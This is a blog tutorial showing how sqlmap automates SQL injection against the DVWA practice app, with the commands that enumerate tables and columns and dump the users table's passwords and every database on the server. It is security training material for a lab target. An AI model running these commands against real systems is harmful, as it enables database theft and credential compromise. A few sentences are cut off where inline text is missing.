In the previous post, we demonstrated how to access user passwords in DVWA by exploiting its SQL Injection vulnerability. This time, we’ll use sqlmap, a powerful and easy to use tool that automates the SQL injection exploitation process, allowing us to dump entire databases with minimal effort.
In the previous post, we guessed that the column in the
users table containing
passwords was called
password. However, if our guess had been incorrect, we
would have needed to inject a UNION SQL query on the information schema database
of the DBMS to retrieve the tables and columns of the targeted database. This
process differs for each DBMS and can be time-consuming. Fortunately, sqlmap
automates this process and more.
With sqlmap, we can automatically detect injectable parameters in a web application and dump whole databases, tables, and columns. It also has built-in exploitation and password cracking automation features, though we won’t be exploring those in this post as we will be using Metasploit and Hashcat for these purposes. Instead, we will focus on exploiting the same SQL injection vulnerability as in the previous post, performing information gathering on the server, and dumping all its databases.
First, we’ll start by intercepting the HTTP request of the SQL injection form using Burp and saving it to a request file. Then we’ll pass this file to sqlmap, which will detect the injectable parameters that it can inspect for SQL injections:
To start using sqlmap, we need to provide it with the request file we saved earlier. Sqlmap can automatically parse the file and detect parameters that may be vulnerable to SQL injection:
sqlmap -r request
When sqlmap finds an injectable parameter, it prompts us to choose whether to skip payloads for the rest of the database management system (in this case, MySQL). Then sqlmap will do information gathering about the system, such as the version, current database, and current user.
If sqlmap successfully identifies an injectable parameter, it will ask if we want to continue searching for more. However, if we’ve found what we need, we can stop and move on to the next step.
Even after sqlmap exits, it will have saved information about the request for future use. Let’s use sqlmap to gather more information, such as the database management system version, the current database, and the current user:
sqlmap -r request --banner --current-user --current-db
Now, let’s list the tables in the dvwa database:
sqlmap -r request -D dvwa --tables
Next, let’s list the columns in the
sqlmap -r request -D dvwa -T users --columns
We can also dump the contents of the
password columns in the
sqlmap -r request -D dvwa -T users -C user,password --dump
However, if we want to dump the entire dvwa database (which is small in our case), we can use the following command:
sqlmap -r request -D dvwa --dump
As a bonus, we can also list all databases on the server:
sqlmap -r request -D dvwa --dbs
And, if we want to dump all databases on the server, we can use the following command:
sqlmap -r request --dump-all
In case you didn’t notice, the stored XSS that we discovered in a past post, ca be seen in the dumped data as well.